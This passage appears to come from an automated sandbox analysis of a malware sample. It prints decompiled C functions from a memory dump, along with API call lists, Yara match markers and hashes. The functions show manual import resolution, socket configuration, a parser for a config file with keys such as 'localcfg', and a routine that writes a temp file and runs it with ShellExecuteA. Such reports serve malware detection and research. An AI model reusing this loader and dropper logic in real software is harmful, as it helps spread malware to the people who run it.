								__eflags = _t56;
								do {
									if(__eflags >= 0) {
										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
										__eflags = _t62;
										if(_t62 == 0) {
											L21:
											_t63 = _a4;
											__eflags =  *(_t63 + _t89);
											if( *(_t63 + _t89) == 0) {
												_t38 =  &_v12;
												 *_t38 = _v12 & 0x00000000;
												__eflags =  *_t38;
												goto L25;
											}
											goto L22;
										}
										_t77 = _a4;
										__eflags = _t62 -  *(_t77 + _t89);
										if(_t62 ==  *(_t77 + _t89)) {
											goto L21;
										}
										L20:
										 *(_t77 + _t89) = _t62;
										goto L21;
									}
									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
									_t77 = _a4;
									goto L20;
									L22:
									_t89 = _t89 + 4;
									_t56 =  *_t89;
									__eflags = _t56;
								} while (__eflags != 0);
								goto L25;
							}
						}
					}
					goto L29;
				}
				return 1;
			}
























                                                                                                                                  0x00406071
                                                                                                                                  0x00406074
                                                                                                                                  0x0040607c
                                                                                                                                  0x0040607c
                                                                                                                                  0x00406082
                                                                                                                                  0x00406087
                                                                                                                                  0x00406099
                                                                                                                                  0x0040609c
                                                                                                                                  0x004060a2
                                                                                                                                  0x004060a4
                                                                                                                                  0x004061b2
                                                                                                                                  0x00000000
                                                                                                                                  0x004061b5
                                                                                                                                  0x004060aa
                                                                                                                                  0x004060ad
                                                                                                                                  0x004060b5
                                                                                                                                  0x004060b5
                                                                                                                                  0x004060b8
                                                                                                                                  0x004060ba
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004060c3
                                                                                                                                  0x004060c9
                                                                                                                                  0x004060cc
                                                                                                                                  0x004060cf
                                                                                                                                  0x004061ae
                                                                                                                                  0x004061ae
                                                                                                                                  0x004061ae
                                                                                                                                  0x004061ae
                                                                                                                                  0x00000000
                                                                                                                                  0x004061ae
                                                                                                                                  0x004060d5
                                                                                                                                  0x004060d5
                                                                                                                                  0x004060d8
                                                                                                                                  0x004060da
                                                                                                                                  0x004060ee
                                                                                                                                  0x004060fa
                                                                                                                                  0x004060dc
                                                                                                                                  0x004060dc
                                                                                                                                  0x004060e7
                                                                                                                                  0x004060e7
                                                                                                                                  0x00406101
                                                                                                                                  0x00406104
                                                                                                                                  0x00406106
                                                                                                                                  0x00000000
                                                                                                                                  0x0040610c
                                                                                                                                  0x0040610c
                                                                                                                                  0x00406112
                                                                                                                                  0x00406115
                                                                                                                                  0x00406118
                                                                                                                                  0x0040611b
                                                                                                                                  0x0040611d
                                                                                                                                  0x0040612d
                                                                                                                                  0x0040612d
                                                                                                                                  0x0040612f
                                                                                                                                  0x0040611f
                                                                                                                                  0x0040611f
                                                                                                                                  0x00406127
                                                                                                                                  0x00406127
                                                                                                                                  0x00406131
                                                                                                                                  0x00406133
                                                                                                                                  0x00406135
                                                                                                                                  0x0040618b
                                                                                                                                  0x0040618b
                                                                                                                                  0x0040618f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406191
                                                                                                                                  0x0040619e
                                                                                                                                  0x004061a4
                                                                                                                                  0x004061a6
                                                                                                                                  0x004060b2
                                                                                                                                  0x00000000
                                                                                                                                  0x004060b2
                                                                                                                                  0x00000000
                                                                                                                                  0x00406137
                                                                                                                                  0x00406137
                                                                                                                                  0x0040613a
                                                                                                                                  0x0040613d
                                                                                                                                  0x0040613f
                                                                                                                                  0x0040613f
                                                                                                                                  0x0040615e
                                                                                                                                  0x00406164
                                                                                                                                  0x00406166
                                                                                                                                  0x00406173
                                                                                                                                  0x00406173
                                                                                                                                  0x00406176
                                                                                                                                  0x0040617a
                                                                                                                                  0x00406187
                                                                                                                                  0x00406187
                                                                                                                                  0x00406187
                                                                                                                                  0x00000000
                                                                                                                                  0x00406187
                                                                                                                                  0x00000000
                                                                                                                                  0x0040617a
                                                                                                                                  0x00406168
                                                                                                                                  0x0040616b
                                                                                                                                  0x0040616e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406170
                                                                                                                                  0x00406170
                                                                                                                                  0x00000000
                                                                                                                                  0x00406170
                                                                                                                                  0x0040614a
                                                                                                                                  0x00406150
                                                                                                                                  0x00000000
                                                                                                                                  0x0040617c
                                                                                                                                  0x0040617c
                                                                                                                                  0x0040617f
                                                                                                                                  0x00406181
                                                                                                                                  0x00406181
                                                                                                                                  0x00000000
                                                                                                                                  0x00406185
                                                                                                                                  0x00406135
                                                                                                                                  0x00406106
                                                                                                                                  0x00000000
                                                                                                                                  0x004060b5
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,004064CF,00000000), ref: 0040609C
                                                                                                                                  • LoadLibraryA.KERNEL32(?,?,004064CF,00000000), ref: 004060C3
                                                                                                                                  • GetProcAddress.KERNEL32(?,00000014), ref: 0040614A
                                                                                                                                  • IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0040619E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Read$AddressLibraryLoadProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2438460464-0
                                                                                                                                  • Opcode ID: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                                                                  • Instruction ID: 2c66ad34c3d6fb1da92a891872b73c8746f5f3d5bf62d79dfacd6c24df0475f4
                                                                                                                                  • Opcode Fuzzy Hash: beeb212f6d5b41c5424ed959fb710d65fbebcae36a96b2ee910fcd89165a7e78
                                                                                                                                  • Instruction Fuzzy Hash: D5418C71A00105AFDB10CF58C884BAAB7B9EF14354F26807AE816EB3D1D738ED61CB84
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004156DA Relevance: 7.6, APIs: 5, Instructions: 120COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __un_inc$__inc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 715532115-0
                                                                                                                                  • Opcode ID: e649c02e62a12101f2747fd93684baa404b5747cfbd2d49534dae470f0e9af3a
                                                                                                                                  • Instruction ID: f942b1f4a04b6f0f9e0d70a22d6cc7c0db211ee0f9e66cba493c5219ac1b7685
                                                                                                                                  • Opcode Fuzzy Hash: e649c02e62a12101f2747fd93684baa404b5747cfbd2d49534dae470f0e9af3a
                                                                                                                                  • Instruction Fuzzy Hash: 55418FB4E00518DFCF14DF69D8955EDB771AF84314F20C29BE82A9B381D639AA80CF58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402923 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                  			E00402923(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short _v28;
				short _v30;
				short _v32;
				char _v292;
				char _v296;
				void* __ebx;
				void* __edi;
				void* _t37;
				intOrPtr _t41;
				signed int* _t42;
				signed short _t53;
				signed int** _t62;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				intOrPtr* _t79;
				signed int* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				_t81 = __esi;
				_t37 = 0xc;
				_v8 = 0;
				_v16 = 0;
				if(_a4 >= _t37) {
					_t67 = E00402816(_t37, __esi, __ecx, __esi, _a4);
					if(_t67 < _a4) {
						_t76 =  *(__esi + 6) & 0x0000ffff;
						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
						_v20 = _t41;
						_v12 = 0;
						if(_t41 <= 0) {
							L13:
							_t42 = _v16;
							L14:
							return _t42;
						}
						while(_t67 < _a4) {
							E0040EE2A(_t76,  &_v296, 0, 0x114);
							_t70 = E00402871(_t67, _t81, _t76,  &_v292, _a4);
							_t15 = _t70 + 0xa; // 0xa
							_t83 = _t82 + 0x10;
							if(_t15 >= _a4) {
								goto L13;
							}
							_t79 = __imp__#15;
							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
							_v28 = _t53;
							_t71 = _t70 + 0xa;
							_v24 = _t71;
							if((_t53 & 0x0000ffff) + _t71 > _a4) {
								goto L13;
							}
							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
							if(_t80 == 0) {
								goto L13;
							}
							E0040EE2A(_t76, _t80, 0, 0x124);
							E0040EE08(_t80,  &_v296, 0x114);
							 *_t80 =  *_t80 & 0x00000000;
							_t67 = _t71 + (_v28 & 0x0000ffff);
							_t62 = _v8;
							_t82 = _t83 + 0x18;
							_v8 = _t80;
							if(_t62 != 0) {
								 *_t62 = _t80;
							} else {
								_v16 = _t80;
							}
							_v12 = _v12 + 1;
							if(_v12 < _v20) {
								continue;
							} else {
								goto L13;
							}
						}
						goto L13;
					}
					_t42 = 0;
					goto L14;
				}
				return 0;
			}




























                                                                                                                                  0x00402923
                                                                                                                                  0x00402931
                                                                                                                                  0x00402932
                                                                                                                                  0x00402935
                                                                                                                                  0x0040293b
                                                                                                                                  0x00402950
                                                                                                                                  0x00402957
                                                                                                                                  0x0040296a
                                                                                                                                  0x0040296e
                                                                                                                                  0x00402970
                                                                                                                                  0x00402973
                                                                                                                                  0x00402978
                                                                                                                                  0x00402a5b
                                                                                                                                  0x00402a5b
                                                                                                                                  0x00402a5e
                                                                                                                                  0x00000000
                                                                                                                                  0x00402a5e
                                                                                                                                  0x0040297e
                                                                                                                                  0x00402995
                                                                                                                                  0x004029ac
                                                                                                                                  0x004029ae
                                                                                                                                  0x004029b1
                                                                                                                                  0x004029b7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004029c1
                                                                                                                                  0x004029ca
                                                                                                                                  0x004029d6
                                                                                                                                  0x004029e0
                                                                                                                                  0x004029e2
                                                                                                                                  0x004029e6
                                                                                                                                  0x004029ee
                                                                                                                                  0x004029f4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402a0a
                                                                                                                                  0x00402a0e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402a18
                                                                                                                                  0x00402a2a
                                                                                                                                  0x00402a33
                                                                                                                                  0x00402a36
                                                                                                                                  0x00402a38
                                                                                                                                  0x00402a3b
                                                                                                                                  0x00402a3e
                                                                                                                                  0x00402a43
                                                                                                                                  0x00402a4a
                                                                                                                                  0x00402a45
                                                                                                                                  0x00402a45
                                                                                                                                  0x00402a45
                                                                                                                                  0x00402a4c
                                                                                                                                  0x00402a55
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402a55
                                                                                                                                  0x00000000
                                                                                                                                  0x0040297e
                                                                                                                                  0x00402959
                                                                                                                                  0x00000000
                                                                                                                                  0x00402959
                                                                                                                                  0x00000000

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 762ec8260f02deadf6d9e217c9def93c366307fd2496715c07d4077f743f5322
                                                                                                                                  • Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
                                                                                                                                  • Opcode Fuzzy Hash: 762ec8260f02deadf6d9e217c9def93c366307fd2496715c07d4077f743f5322
                                                                                                                                  • Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040E654 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 96stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t30;
				CHAR* _t31;
				int _t34;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t47;
				intOrPtr _t51;
				int _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t55;
				char _t59;

				E0040DD05();
				_t41 = 0x4120e8;
				_t55 =  *0x4120e8 - 0x4120e8; // 0x4120e8
				if(_t55 == 0) {
					L9:
					_t53 = E0040EBCC(0x1c);
					if(_t53 != 0) {
						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
						 *((intOrPtr*)(_t53 + 4)) = _a8;
						E00403E8F(0x4120e8, _t53);
						__eflags = _a12;
						if(_a12 == 0) {
							 *(_t53 + 8) = 0;
						} else {
							_t15 = _t53 + 8; // 0x8
							lstrcpynA(_t15, _a12, 0xf);
							 *((char*)(_t53 + 0x17)) = 0;
						}
						L15:
						_t42 = 0x4120e4;
						__eflags =  *0x4120e4 - _t42; // 0x4120e4
						if(__eflags == 0) {
							L22:
							_t47 = 1;
							L11:
							E0040DD69();
							return _t47;
						} else {
							goto L16;
						}
						do {
							L16:
							_t30 =  *((intOrPtr*)(_t53 + 4));
							_t51 =  *_t42;
							__eflags = _t30 - 0xffffffff;
							if(_t30 == 0xffffffff) {
								L18:
								_t20 = _t53 + 8; // 0x8
								_t31 = _t20;
								__eflags =  *_t31;
								if( *_t31 == 0) {
									L20:
									_t52 = _t51 + 0xc;
									__eflags = _t52;
									 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
									goto L21;
								}
								_t34 = lstrcmpA(_t51 + 0x10, _t31);
								__eflags = _t34;
								if(_t34 != 0) {
									goto L21;
								}
								goto L20;
							}
							__eflags =  *(_t51 + 0xc) - _t30;
							if( *(_t51 + 0xc) != _t30) {
								goto L21;
							}
							goto L18;
							L21:
							_t42 =  *_t42;
							__eflags =  *_t42 - 0x4120e4;
						} while ( *_t42 != 0x4120e4);
						goto L22;
					}
					_t47 = 0;
					goto L11;
				} else {
					goto L1;
				}
				do {
					L1:
					_t54 =  *_t41;
					if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
						if(_a12 != 0) {
							_t8 = _t54 + 8; // 0x761b43e8
							__eflags = lstrcmpA(_t8, _a12);
						} else {
							_t59 =  *(_t54 + 8);
						}
						if(_t59 == 0) {
							break;
						} else {
							goto L7;
						}
					}
					L7:
					_t41 =  *_t41;
					_t53 = 0;
				} while ( *_t41 != 0x4120e8);
				if(_t53 != 0) {
					goto L15;
				}
				goto L9;
			}















                                                                                                                                  0x0040e65a
                                                                                                                                  0x0040e664
                                                                                                                                  0x0040e666
                                                                                                                                  0x0040e66c
                                                                                                                                  0x0040e6a9
                                                                                                                                  0x0040e6b0
                                                                                                                                  0x0040e6b5
                                                                                                                                  0x0040e6c8
                                                                                                                                  0x0040e6d0
                                                                                                                                  0x0040e6d3
                                                                                                                                  0x0040e6d8
                                                                                                                                  0x0040e6de
                                                                                                                                  0x0040e6f5
                                                                                                                                  0x0040e6e0
                                                                                                                                  0x0040e6e5
                                                                                                                                  0x0040e6e9
                                                                                                                                  0x0040e6ef
                                                                                                                                  0x0040e6ef
                                                                                                                                  0x0040e6f9
                                                                                                                                  0x0040e6f9
                                                                                                                                  0x0040e6fe
                                                                                                                                  0x0040e704
                                                                                                                                  0x0040e741
                                                                                                                                  0x0040e743
                                                                                                                                  0x0040e6b9
                                                                                                                                  0x0040e6b9
                                                                                                                                  0x0040e6c4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e706
                                                                                                                                  0x0040e706
                                                                                                                                  0x0040e706
                                                                                                                                  0x0040e709
                                                                                                                                  0x0040e70b
                                                                                                                                  0x0040e70e
                                                                                                                                  0x0040e715
                                                                                                                                  0x0040e715
                                                                                                                                  0x0040e715
                                                                                                                                  0x0040e718
                                                                                                                                  0x0040e71b
                                                                                                                                  0x0040e72c
                                                                                                                                  0x0040e72c
                                                                                                                                  0x0040e72c
                                                                                                                                  0x0040e732
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e736
                                                                                                                                  0x0040e722
                                                                                                                                  0x0040e728
                                                                                                                                  0x0040e72a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e72a
                                                                                                                                  0x0040e710
                                                                                                                                  0x0040e713
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e737
                                                                                                                                  0x0040e737
                                                                                                                                  0x0040e739
                                                                                                                                  0x0040e739
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e706
                                                                                                                                  0x0040e6b7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e66e
                                                                                                                                  0x0040e66e
                                                                                                                                  0x0040e66e
                                                                                                                                  0x0040e676
                                                                                                                                  0x0040e684
                                                                                                                                  0x0040e68f
                                                                                                                                  0x0040e699
                                                                                                                                  0x0040e686
                                                                                                                                  0x0040e686
                                                                                                                                  0x0040e686
                                                                                                                                  0x0040e69b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e69b
                                                                                                                                  0x0040e69d
                                                                                                                                  0x0040e69d
                                                                                                                                  0x0040e69f
                                                                                                                                  0x0040e6a1
                                                                                                                                  0x0040e6a7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
                                                                                                                                    • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
                                                                                                                                    • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
                                                                                                                                  • lstrcmpA.KERNEL32(761B43E8,00000000,?,761B43E0,00000000,?,00405EC1), ref: 0040E693
                                                                                                                                  • lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,761B43E0,00000000,?,00405EC1), ref: 0040E6E9
                                                                                                                                  • lstrcmpA.KERNEL32(?,00000008,?,761B43E0,00000000,?,00405EC1), ref: 0040E722
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
                                                                                                                                  • String ID: A$ A
                                                                                                                                  • API String ID: 3343386518-686259309
                                                                                                                                  • Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                                                                  • Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
                                                                                                                                  • Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
                                                                                                                                  • Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040F26D Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
                                                                                                                                  • setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
                                                                                                                                  • setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
                                                                                                                                  • setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
                                                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: setsockopt
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3981526788-0
                                                                                                                                  • Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                                                                  • Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
                                                                                                                                  • Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
                                                                                                                                  • Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00409145 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                  			E00409145(void* __eflags) {
				char _v264;
				char _v1288;
				char* _t13;
				void* _t20;
				void* _t23;
				void* _t29;

				_t29 = __eflags;
				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
				CharToOemA( &_v264,  &_v264);
				_t13 =  &_v264;
				_push(_t13);
				_push(_t13);
				wsprintfA( &_v1288, E00402544(0x4122f8,  &E004107A8, 0x66, 0xe4, 0xc8));
				E0040EE2A(_t23, 0x4122f8, 0, 0x100);
				_t20 = E00409064(_t29,  &_v1288,  &_v264);
				if(_t20 != 0) {
					return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
				}
				return _t20;
			}









                                                                                                                                  0x00409145
                                                                                                                                  0x00409166
                                                                                                                                  0x00409174
                                                                                                                                  0x0040917a
                                                                                                                                  0x00409180
                                                                                                                                  0x00409181
                                                                                                                                  0x004091a9
                                                                                                                                  0x004091b6
                                                                                                                                  0x004091c9
                                                                                                                                  0x004091d3
                                                                                                                                  0x00000000
                                                                                                                                  0x004091e1
                                                                                                                                  0x004091ea

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,004122F8), ref: 0040915F
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
                                                                                                                                  • CharToOemA.USER32 ref: 00409174
                                                                                                                                  • wsprintfA.USER32 ref: 004091A9
                                                                                                                                    • Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
                                                                                                                                    • Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
                                                                                                                                    • Part of subcall function 00409064: CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
                                                                                                                                    • Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
                                                                                                                                    • Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
                                                                                                                                    • Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134
                                                                                                                                  • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3857584221-0
                                                                                                                                  • Opcode ID: 94b6a3cd4bae5339fb675e52ca0e10f722d210c4c3e56ae61748716d573fc5c2
                                                                                                                                  • Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
                                                                                                                                  • Opcode Fuzzy Hash: 94b6a3cd4bae5339fb675e52ca0e10f722d210c4c3e56ae61748716d573fc5c2
                                                                                                                                  • Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402419 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00402419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
				int _v8;
				int _t18;
				intOrPtr _t20;
				CHAR* _t21;
				int _t30;
				CHAR* _t36;

				_t18 = lstrlenA(_a12);
				_t36 = _a4;
				_v8 = _t18;
				_t20 = _a8 + _t36;
				_a8 = _t20;
				if(_t36 >= _t20) {
					L5:
					_t21 = 0;
				} else {
					while(1) {
						_t30 = lstrlenA(_t36);
						_t7 =  &(_t36[1]); // 0x1
						_a4 = _t30 + _t7;
						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
							break;
						}
						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
						if(_t36 < _a8) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t21 = _a4;
				}
				L6:
				return _t21;
			}









                                                                                                                                  0x00402429
                                                                                                                                  0x0040242b
                                                                                                                                  0x0040242e
                                                                                                                                  0x00402434
                                                                                                                                  0x00402436
                                                                                                                                  0x0040243b
                                                                                                                                  0x00402474
                                                                                                                                  0x00402474
                                                                                                                                  0x0040243d
                                                                                                                                  0x0040243d
                                                                                                                                  0x00402440
                                                                                                                                  0x00402442
                                                                                                                                  0x00402446
                                                                                                                                  0x0040244c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040246b
                                                                                                                                  0x00402472
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402472
                                                                                                                                  0x0040247b
                                                                                                                                  0x0040247b
                                                                                                                                  0x00402476
                                                                                                                                  0x0040247a

                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
                                                                                                                                  • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
                                                                                                                                  • lstrcmpiA.KERNEL32(?,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg), ref: 00402452
                                                                                                                                  • lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$lstrcmpi
                                                                                                                                  • String ID: localcfg
                                                                                                                                  • API String ID: 1808961391-1857712256
                                                                                                                                  • Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                                                                  • Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
                                                                                                                                  • Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
                                                                                                                                  • Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98
                                                                                                                                  Uniqueness

